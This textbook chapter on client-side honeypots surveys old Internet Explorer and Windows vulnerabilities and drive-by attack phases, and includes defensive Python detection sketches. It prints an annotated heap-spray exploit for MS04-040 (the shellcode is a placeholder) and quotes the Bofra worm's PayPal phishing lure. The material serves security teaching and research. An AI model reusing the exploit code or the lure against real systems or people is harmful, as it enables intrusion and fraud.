
8. Client Honeypots

8.1 Learning More About Client-Side Threats

8.2 Low-Interaction Client Honeypots

8.3 High-Interaction Client Honeypots

8.4 Other Approaches

8.5 Summary

Since we see more and more attackers exploiting holes in client programs (e.g., via vulnerabilities in Microsoft's Internet Explorer or Office programs), the functions of honeypots must evolve further. In this chapter, we introduce a new application of honeynets to deal with this threat. This application is based on the original idea of honeypots, but it develops it further in another direction. This cannot be done without leaving the boundaries given by the original approach: We now completely omit the passive methodology given by classical honeypots, as introduced in the previous chapters. Instead of passively waiting for an attacker and offering bait, we now actively search for malicious activities and content on the Internet. The main idea behind all client-side honeypots is to simulate the behavior of a human and to analyze whether such behavior would be exploited by a malicious attacker. For example, a client-side honeypot could be a mechanism to drive a web browser. With additional tools and techniques, the honeypot is then observed and anomalies caused by malicious websites are detected. In this chapter we focus on these web-based honeypots.

Of course, we cannot just search the whole Internet for malicious activity — not even search the whole World Wide Web for malicious websites — but we can base our search on locations that are suspicious or presumably malicious. In the following, we introduce several approaches to finding these locations and show how to use honeypots to learn more about them. This whole new field is quickly developing, and preliminary results show that this approach is viable. We present these results in detail and show how you can benefit from them.

8.1. Learning More About Client-Side Threats

In recent years, we have seen a new trend in the way adversaries attack systems. In addition to attacks against server systems (e.g., a web or mail server), there are more and more attacks against client systems. The end user is becoming the weakest link in the whole security architecture. And since a chain is only as strong as its weakest link, we need to find ways to learn more about these client-side threats.

First, let us review what kinds of attacks against client systems we have already seen. One of the most prominent examples is the class of attacks that involve Microsoft's Internet Explorer, the web browser with the highest market share. According to the SANS Top-20 Internet Security Attack Targets for 2006 [76], Internet Explorer is the most common target for attacks. Internet Explorer has had several vulnerabilities in the past, some of which were rated critical. According to our research, some of the most often exploited vulnerabilities are the following:

MS04-013 (MHTML URL Processing Vulnerability/CAN-2004-0380). By abusing the MHTML protocol handler, a remote attacker can bypass domain restrictions and execute code of his choice. Normally MHTML is used by Microsoft Outlook, but Internet Explorer also can be used as an attack vector using compiled help (CHM) files. In this case, the CHM file references the InfoTech Storage (ITS) protocol handlers such as (1) ms-its, (2) ms-itss, (3) its, or (4) mk:@MSITStore.
MS04-040 (HTML Elements Vulnerability - IFRAME). A web page with an Inline Floating Frame (IFRAME) tag and long values supplied to the SRC and NAME properties causes a buffer overflow. As a result, the attacker can execute the code of his choice if he tricks the victim into viewing a malicious web page. This vulnerability was also used by the Bofra worm in November 2004 to spread further, and we take a closer look at it in Section 8.1.1.
MS05-002 (Vulnerability in Cursor and Icon Format Handling Could Allow Remote Code Execution). Due to a buffer overflow in the handling of cursor, animated cursor, and icon formats (.ANI files), it is possible to remotely execute code of the attacker's choice. The attacker must construct a malicious cursor or icon file and lure the victim to visit a malicious website or view a malicious HTML e-mail message.
MS06-001 (Vulnerability in Graphics Rendering Engine Could Allow Remote Code Execution). A remote command execution is possible with the help of GDI32.DLL (Graphical Device Interface). A special meta record (SetAbortProc) within Windows Meta Files (.WMF files) can be abused to execute arbitrary user-supplied code. In this case, the attacker must convince the victim to open a malicious WMF file that could, for example, be embedded in a web page.
MS06-057 (Vulnerability in Windows Explorer Could Allow Remote Execution). Due to improper input validation, the WebViewFolderIcon ActiveX control (webvw.dll) contains a vulnerability in the function setSlice(). This can be exploited by an attacker to execute arbitrary commands.

As you can see, there are many possible attacks. In 2006 in particular, we saw a rather large increase in published vulnerabilities in Internet Explorer: Microsoft issued at least seven security bulletins concerning it.

Some of these vulnerabilities were exploited as zero-days (0days), that is, they were attacked before a patch was available to fix the flaw. For example, in the middle of December 2005, there were rumors about a possible vulnerability in Windows when displaying WMF files. The corresponding exploit was offered for $4000 on the black market. The first advisories about this vulnerability were published on December 27. Within a couple of days, several hundred malicious websites appeared on the Internet with a WMF image that exploited this vulnerability. Most of these websites installed a Trojan horse or some other kind of malware on the compromised machine. On January 2, 2006, several members of the British Parliament received specially prepared WMF files via e-mail, which shows that this vulnerability could also be used for targeted attacks. Finally, on January 5, Microsoft issued a patch with Microsoft Security Bulletin MS06-001. Nevertheless, there are still attacks using this vulnerability, since not all computers are patched.

8.1.1. A Closer Look at MS04-040

As a longer and more technical example, we want to take a closer look at the vulnerability described in the Microsoft security bulletin MS04-040 to give you an overview of the threat. MS04-040 (available at http://www.microsoft.com/technet/security/bulletin/ms04-040.mspx) describes a vulnerability in the handling of long SRC and NAME attributes within an <IFRAME> (inline floating frame) tag. This leads to a heap buffer overflow that ultimately results in the possibility of remote command execution. An attacker can take advantage of this flaw by constructing a specially crafted web page and then tricking the victim into opening this web page. This can, for example, be done by embedding a link in an e-mail message, by sending the link to the victim via an instant messaging program, by linking the malicious web page from another web page (this can be almost invisible to the victim), or by other techniques related to social engineering.

A look at the timeline of this vulnerability is also interesting: It was discovered by nd@felinemenace.org in late October 2004. Shortly after he announced his findings via the mailing list BugTraq, Berend-Jan Wever posted a preliminary analysis. To trigger the buffer overflow, it is only necessary to include a tag of the form <IFRAME SRC="AAAAAAAAAAAA...." NAME="BBBBBBBBBBB...."> in an HTML file. This overflows a buffer, and as a result, the attacker has control over the processor register EAX. Due to the code following this overflow, the attacker can also get control over a few other CPU registers and ultimately control the instruction pointer EIP. This allows him to execute code of his choice. The attacker is able to fully compromise the target system.

A few days later, Berend-Jan Wever also released a proof-of-concept exploit for this vulnerability under the name Internet Exploiter v0.1, which is available at http://www.milw0rm.com/exploits/612. The interesting idea behind this exploit is a technique now called heap spraying: The exploit code creates blocks that contain the shellcode (the commands the attacker wants to execute) together with some additional information. Instead of creating only one such block, the exploit code creates 700 of them to be sure that at least one ends up at the right memory location. Heap spraying is now one of the common building blocks of attacks against Internet Explorer, and you will see it in many exploits. The following listing is a shortened version of this exploit with a few more embedded comments. It gives you an overview of what such an exploit looks like and how easy it is for an attacker to exploit a client's vulnerability.


    <HTML>
    // the following code prepares the heap in a clever way so that the
    // attacker can execute code of his choice. Memory is allocated and
    // filled with blocks consisting of NOP slides and shellcode.
    <SCRIPT language="javascript">
        // this code will open a backdoor on a compromised machine
        shellcode = <shellcode for bindshell to port 28876>
        // Nopslide will contain these bytes:
        bigblock = unescape("%u0D0D%u0D0D");
        // Heap blocks in IE have 20 dwords as header
        headersize = 20;
        // This is all very 1337 code to create a nopslide that will fit exactly
        // between the the header and the shellcode in the heap blocks we want.
        // The heap blocks are 0x40000 dwords big, I can't be arsed to write good
        // documentation for this.
        slackspace = headersize+shellcode.length
        while (bigblock.length<slackspace) bigblock+=bigblock;
        fillblock = bigblock.substring(0, slackspace);
        block = bigblock.substring(0, bigblock.length-slackspace);
        while(block.length+slackspace<0x40000) block = block+block+fillblock;
        // And now we can create the heap blocks, we'll create 700 of them to
        // spray enough memory to be sure enough that we've got one at 0x0D0D0D0D
        memory = new Array();
        for (i=0;i<700;i++) memory[i] = block + shellcode;
    </SCRIPT>
    <!--
    The exploit sets eax to 0x0D0D0D0D after which this code gets executed:
    7178EC02 8B08          MOV ECX, DWORD PTR [EAX]
      [0x0D0D0D0D] == 0x0D0D0D0D, so ecx = 0x0D0D0D0D.
    7178EC04 68 847B7071   PUSH 71707B84
    7178EC09 50            PUSH EAX
    7178EC0A FF11          CALL NEAR DWORD PTR [ECX]
      Again [0x0D0D0D0D] == 0x0D0D0D0D, so we jump to 0x0D0D0D0D.
      We land inside one of the nopslides and slide on down to the shellcode.
    -->
    <!-- The actual buffer overflow with long SRC and NAME properties -->
    <IFRAME SRC=file//<578 x B> NAME="<2086 x C>\x0D\x0D\x0D\x0D">
    </IFRAME>
    </HTML>
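Seen from the defender's side, the trigger described above (an IFRAME tag with very long SRC and NAME values) is easy to look for statically. The following Python sketch is one possible heuristic and is not taken from any existing honeyclient: the names `IframeAuditor` and `audit_iframes` and the threshold `MAX_ATTR_LEN` are assumptions chosen for illustration, and a real detector would need to be far more robust against obfuscation.

```python
from html.parser import HTMLParser

# Hypothetical threshold: legitimate SRC/NAME values are rarely this long.
MAX_ATTR_LEN = 512


class IframeAuditor(HTMLParser):
    """Collects <iframe> tags whose src or name attribute is suspiciously long."""

    def __init__(self, max_len=MAX_ATTR_LEN):
        super().__init__()
        self.max_len = max_len
        self.findings = []  # list of (attribute name, attribute length)

    def handle_starttag(self, tag, attrs):
        # HTMLParser passes tag and attribute names in lowercase.
        if tag != "iframe":
            return
        for name, value in attrs:
            if name in ("src", "name") and value and len(value) > self.max_len:
                self.findings.append((name, len(value)))


def audit_iframes(html, max_len=MAX_ATTR_LEN):
    """Return a list of (attribute, length) pairs for oversized iframe attributes."""
    auditor = IframeAuditor(max_len)
    auditor.feed(html)
    auditor.close()
    return auditor.findings
```

A page that only builds the tag dynamically with JavaScript would slip past this check, which is one reason the later sections also consider honeypots that actually render the page.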

On November 8, 2004, a worm called Bofra started to spread using this vulnerability. In the first step, the worm sends e-mail messages to potential victims. These messages pose as photos from an adult webcam or as a PayPal credit card notification in an attempt to trick the recipient into clicking on a link. The message body reads, for example, as follows:


    Congratulations! PayPal has successfully charged $175 to your credit card.
    Your order tracking number is A866DEC0, and your item will be shipped
    within three business days.

    To see details please click this link.

    DO NOT REPLY TO THIS MESSAGE VIA EMAIL! This email is being sent by an
    automated message system and the reply will not be received.

    Thank you for using PayPal.

Other variants of Bofra use a different text in the message body, but the aim is always the same: via techniques borrowed from the area of social engineering, the worm tries to trick the victim into clicking on the link. If the victim believes this scam and opens the link, the browser is directed to a web server running on the sender's machine. This web server sends a malicious web page containing the exploit for the IFRAME vulnerability. With the help of this exploit, the Bofra worm is installed on the victim's machine, where it starts to spread further by sending e-mail messages to contacts found on that machine. In addition, it starts a web server on the infected host so that new victims can be infected. The cycle then starts again. The whole process is illustrated in Figure 8.1.

Figure 8.1. Spreading of Bofra worm.


Finally, on December 1, 2004, Microsoft patched this vulnerability with MS04-040. It thus took about one month to release a patch. In the meantime, thousands of end-user systems were infected.

8.1.2. Other Types of Client-Side Attacks

Besides Microsoft's Internet Explorer, we have also observed many other client programs that are now targeted by adversaries. Other popular Microsoft programs like Outlook/Outlook Express, Media Player, or the Office suite can be targets. But popular tools from other vendors are not safe either. In the last few years, severe remote vulnerabilities were identified in RealNetworks' RealPlayer, Mozilla Firefox, Oracle databases, AOL Instant Messenger (AIM), Nullsoft Winamp media player, and Serv-U FTP server, to name just a few. This shows that you can never be sure that you are safe when you use the Internet. Presumably, one of your programs contains an exploitable vulnerability, and you must take care to avoid obvious "bad places" on the Internet. But with the help of honeypots, we can learn more about these kinds of attacks!

In addition to the attacks against specific programs, there are also exploitable vulnerabilities in systemwide libraries used by client applications. As an example, consider a media library that renders an image or a movie. If this library has a flaw, it might be exploitable via an image viewer, your e-mail program, or the web browser you use. Thus, the vulnerability does not have to be within the program itself; it can be within a third-party library. In the past, we have seen these kinds of vulnerabilities especially in multimedia libraries or other parsing libraries. We have already briefly mentioned the WMF vulnerability in the previous section, but there are many more examples. One of the most prominent examples of this type of attack is presumably the ASN.1 vulnerability published in Microsoft Security Bulletin MS04-007 (ASN.1 Vulnerability Could Allow Code Execution, http://www.microsoft.com/technet/security/bulletin/MS04-007.mspx). Abstract Syntax Notation One (ASN.1) is a standard and flexible notation that describes data structures for representing, encoding, transmitting, and decoding data. It is used to describe the structure of objects independently of machine-specific encoding techniques. As you may guess, ASN.1 is quite complex, and lots of parsing is involved. The Microsoft ASN.1 library has a vulnerability caused by an unchecked buffer, which can result in a buffer overflow. An attacker can use this flaw to remotely execute arbitrary commands on the victim's machine. Since the flaw resides in the library, several programs like Internet Explorer, Outlook/Outlook Express, or third-party applications that use certificates are affected. In the SANS Top-20 Internet Security Attack Targets for 2006, Windows libraries are rated as the second most severe threat. To quote the SANS Top 20 list [76]:

The critical libraries affected during past year include:

Vulnerability in Windows Explorer Could Allow Remote Execution (MS06-057, MS06-015)
Vulnerabilities in Microsoft Windows Hyperlink Object Library Could Allow Remote Code Execution (MS06-050)
Vulnerability in HTML Help Could Allow Remote Code Execution (MS06-046)
Vulnerability in Microsoft Windows Could Allow Remote Code Execution (MS06-043)
Vulnerability in Graphics Rendering Engine Could Allow Remote Code Execution (MS06-026, MS06-001)
Vulnerability in Embedded Web Fonts Could Allow Remote Code Execution (MS06-002)
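To make the remark about ASN.1 parsing and unchecked buffers more concrete, here is a small Python sketch of reading one tag-length-value element as used by the BER/DER encodings of ASN.1. It is not Microsoft's code and does not reproduce the MS04-007 flaw, whose details are not given here; it only illustrates the general class of mistake, namely trusting a length field supplied by the sender. The function name `read_tlv` is hypothetical, and the sketch assumes single-byte tags and definite lengths only.

```python
def read_tlv(data: bytes, offset: int = 0):
    """Read one tag-length-value element; return (tag, value, next_offset).

    Simplifications (assumptions of this sketch): single-byte tags only,
    definite lengths only.
    """
    if offset + 2 > len(data):
        raise ValueError("truncated header")
    tag = data[offset]
    first = data[offset + 1]
    pos = offset + 2
    if first < 0x80:
        length = first        # short form: the byte itself is the length
    else:
        n = first & 0x7F      # long form: the next n bytes hold the length
        if n == 0:
            raise ValueError("indefinite length not supported")
        if pos + n > len(data):
            raise ValueError("truncated length field")
        length = int.from_bytes(data[pos:pos + n], "big")
        pos += n
    # The crucial check: never trust the declared length.
    if length > len(data) - pos:
        raise ValueError("declared length exceeds available data")
    return tag, data[pos:pos + length], pos + length
```

In a language without bounds-checked buffers, omitting the final comparison and copying `length` bytes into a fixed-size buffer is the kind of error that turns a parsing library into an attack vector for every program that links against it.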

The preceding examples make clear that there are many attack vectors against client programs. Not only the actual program but also any library it uses can be the gateway to compromising a system. Client-side attacks are often used in targeted attacks against companies, government authorities, military targets, or other kinds of lucrative targets. For example, in 2006 there were several such attacks against organizations within the United States. The attackers used unknown vulnerabilities in Office applications (0day attacks). They sent a few e-mail messages with attachments, for example, a Microsoft PowerPoint presentation or a Microsoft Word document, to recipients within the target organizations. These documents contained an exploit for an unknown vulnerability and installed a piece of malware on the compromised machine. With the help of this malware, the attacker could steal confidential information or install additional tools on the compromised machine. Titan Rain is the U.S. government's designation for a series of such targeted attacks against American computer systems since the beginning of 2003. It is not really clear who is behind these attacks (i.e., state-sponsored espionage, corporate espionage, or random hacker attacks), but they are believed to be Chinese in origin, according to investigations by Shawn Carpenter and some other researchers [54]. So these vulnerabilities are actually used in the wild and pose a severe threat.

8.1.3. Toward Client Honeypots

As you saw in the previous sections, there is a wide variety of attacks against client applications. The main question for us is how we can design honeypots to learn more about these kinds of attacks.

One idea for such a new type of honeypot is the client-side honeypot. Since we see more and more attackers exploiting holes in client programs (e.g., via exploits in Microsoft's Internet Explorer), the use of honeypots must evolve further. As clients depend on the server they are working with, we need to design client-side honeypots according to the protocol of the server that we want to observe. This is where we change the classical behavior of honeypots: We do not just passively wait for attackers but actively search for malicious content. This can, for example, be achieved by simulating human behavior and then determining whether our simulated system was exploited.

We differentiate between two kinds of client-side honeypots. On the one hand, this type of honeypot can be active. This is the usual behavior, since such clients connect to a given server, send some commands, and get back the results (e.g., web browsers). On the other hand, some client-side honeypots are passive, waiting for an event to happen (e.g., e-mail clients), which means we have to find a way to trigger that event. In the main part of this chapter, we will focus on active honeyclients, mostly those dealing with malicious websites, since these pose the most severe threat. These web-based honeypots are currently the area in which most research happens, and a few honeypot solutions have already been released.
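The control flow of an active honeyclient can be sketched in a few lines of Python. This is a minimal illustration under stated assumptions, not the design of any released tool: `run_honeyclient` is a hypothetical name, and both `fetch` (which retrieves the content for a URL) and `is_malicious` (which decides whether the visit looks like an attack) are hooks the caller has to supply.

```python
from collections import deque


def run_honeyclient(seed_urls, fetch, is_malicious, max_visits=100):
    """Visit URLs from a queue and return those flagged as malicious.

    fetch(url) -> str and is_malicious(url, content) -> bool are supplied by
    the caller; both are hypothetical hooks, not part of any real tool.
    """
    queue = deque(seed_urls)
    seen = set()
    flagged = []
    while queue and len(seen) < max_visits:
        url = queue.popleft()
        if url in seen:
            continue  # never visit the same location twice
        seen.add(url)
        try:
            content = fetch(url)
        except OSError:
            continue  # unreachable servers are skipped
        if is_malicious(url, content):
            flagged.append(url)
    return flagged
```

Keeping the two hooks separate from the loop reflects the distinction made later in the chapter: a low-interaction honeyclient would plug in a simple downloader and a static content check, whereas a high-interaction one would drive a real browser and inspect the system state afterward.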

This type of honeypot aims at finding web servers that compromise the browser. The web-based honeyclient can be the target of different kinds of attacks, but most of them follow the same four phases. In the first phase, the attacker sets up the website containing at least one exploit. Most often this website contains not just one exploit but several of them. This way the attacker can target more platforms and different versions of web browsers with a single page. In addition, the attacker often tries to obfuscate the exploit in this phase, for example, by using different encoding options, by dynamically creating the content with the help of JavaScript, by using custom functions to decode the content, or by similar means. With the help of these obfuscation techniques, the actual exploit can very often evade an intrusion detection system or similar defensive countermeasures. In addition, obfuscation complicates the analysis task for a human investigator.
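One of the simplest encoding tricks is escaping the payload so that it only becomes readable after JavaScript's `unescape()` has run; the exploit listing in Section 8.1.1 uses the same function to build its heap blocks. The Python sketch below mimics that decoding for `%uXXXX` and `%XX` sequences so that an analyst can look at the decoded text without executing the page. The helper names `js_unescape` and `peel` are hypothetical, and repeated decoding is only a heuristic: it can also mangle legitimate text that happens to contain such sequences.

```python
import re

# Matches the two escape forms understood by JavaScript's unescape().
_ESCAPE = re.compile(r"%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})")


def js_unescape(text):
    """Decode %uXXXX and %XX sequences the way JavaScript's unescape() does."""
    def repl(match):
        return chr(int(match.group(1) or match.group(2), 16))
    return _ESCAPE.sub(repl, text)


def peel(text, max_rounds=5):
    """Apply js_unescape repeatedly until the text stops changing."""
    for _ in range(max_rounds):
        decoded = js_unescape(text)
        if decoded == text:
            break
        text = decoded
    return text
```

Custom decoder functions written by the attacker cannot be undone this generically; for those, the content usually has to be evaluated in some kind of JavaScript engine.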

In the optional second phase, the attacker sets up a network of malicious websites. Very often one bad site redirects the victim automatically to another bad site or embeds another site into the current one. This is used to deliver additional exploits or other content to the victim. The redirect can be implemented in several ways: with JavaScript (e.g., by calling window.open() or by assigning to window.location.href), with an HTTP redirect via a 302 (Found) status code, or with an HTML element like <meta http-equiv="refresh" content="..."> or <iframe src="...">. A very common setup is a "dispatcher" page that detects the version of the victim's operating system and web browser and then redirects him to the appropriate exploit page. But this linking can also span multiple websites or domains to reroute victims to additional malicious servers.
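A honeyclient has to follow these links to reach the page that actually carries the exploit. The Python sketch below collects redirect targets from a single HTTP response for three of the mechanisms just mentioned: the 302 status code, the meta refresh element, and embedded iframes. The names `RedirectFinder` and `find_redirects` are hypothetical, the headers are assumed to be a plain dictionary with a `Location` key, and JavaScript-based redirects are deliberately left out because they cannot be resolved reliably without executing the script.

```python
import re
from html.parser import HTMLParser


class RedirectFinder(HTMLParser):
    """Collects iframe sources and meta-refresh targets from an HTML page."""

    def __init__(self):
        super().__init__()
        self.targets = []  # list of (kind, url)

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "iframe" and attrs.get("src"):
            self.targets.append(("iframe", attrs["src"]))
        elif tag == "meta" and (attrs.get("http-equiv") or "").lower() == "refresh":
            # Typical content value: "0; url=http://example.com/"
            match = re.search(r"url\s*=\s*['\"]?([^'\";]+)",
                              attrs.get("content") or "", re.I)
            if match:
                self.targets.append(("meta-refresh", match.group(1).strip()))


def find_redirects(status, headers, body):
    """Return (kind, url) pairs for every redirect found in one response."""
    targets = []
    if status == 302 and "Location" in headers:
        targets.append(("http-302", headers["Location"]))
    finder = RedirectFinder()
    finder.feed(body)
    finder.close()
    return targets + finder.targets
```

Feeding each returned URL back into the visiting queue lets the honeyclient walk the whole chain from a dispatcher page to the final exploit page.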

The third phase is the actual exploitation phase. Once everything is set up, the attacker has to lure victims to the trap with different techniques borrowed from the area of social engineering. He can, for example, send mass e-mails containing links, send instant messages via common IM software, lure users on social network sites, distribute the link via a peer-to-peer application, and so on. Once the victim clicks on the link, he is redirected to the malicious website and the exploitation takes place.

In the fourth and final phase, once the attacker has exploited a vulnerability on the victim's system, he typically wants to install some kind of malware on the compromised machine. This helps him gain complete control over the system, which he can then use as a stepping stone for additional attacks, to steal sensitive information, or for other nefarious purposes. For example, an attacker could have the following goals:

To install an IRC bot. The goal is to install an Internet Relay Chat (IRC) bot so the infected machine becomes part of a botnet and can be remotely controlled by the attacker. The background of bots and botnets is covered in Chapter 11, and we can learn more about different kinds of bots with the help of nepenthes, which is introduced in Chapter 6.
To install a proxy. The goal is to take control of the host and install a SOCKS proxy. A proxy is an intermediary service that acts as both a server and a client, and conducts requests on behalf of other clients. With the help of a SOCKS proxy, an attacker can, for example, send spam e-mails or do other mischief.
To install spyware or a keylogger. The goal is to install malware that captures sensitive information from the victim's machine and sends it back to the attacker. This form of identity theft is quite common nowadays; for example, credit card numbers, passwords, or cookies can be stolen from the compromised machines this way.
To install Browser Helper Objects (BHOs) or other kinds of adware. In this scenario, the attacker installs malicious extensions for the web browser, most often in the form of BHOs, which are modules designed to enhance the browser on the victim's machine. These BHOs then display advertisements to the victim or send information about the browsing behavior to the attacker. The attacker can achieve similar results by installing adware on the target. In both cases, the attacker wants to gain some financial advantage by delivering ads.

Many other attack vectors are possible. Because the attacker can issue the commands of his choice, his actions are almost arbitrary. He can use the victim's machine for whatever purpose he has in mind.

Since most of the time we do not have to observe phases one and two, we will focus on the last two phases. We want to find the malicious websites and also learn more about the malware binaries installed on the victim's machine. In the following sections, we first focus on low-interaction client honeypots. We show different approaches to using the low-interaction paradigm in this new area and present preliminary results obtained by different projects. In the second half, we focus on a high-interaction approach for client honeypots. This is more challenging, and up to now only a limited number of projects use this concept. We show how such a high-interaction honeypot can be realized and again present preliminary results. In the academic community, some researchers have developed concepts that can also be classified as client honeypots. We present some of them and show you how you can benefit from their results. An excellent introduction to the topic of honeyclients is available in a presentation by Danford [18].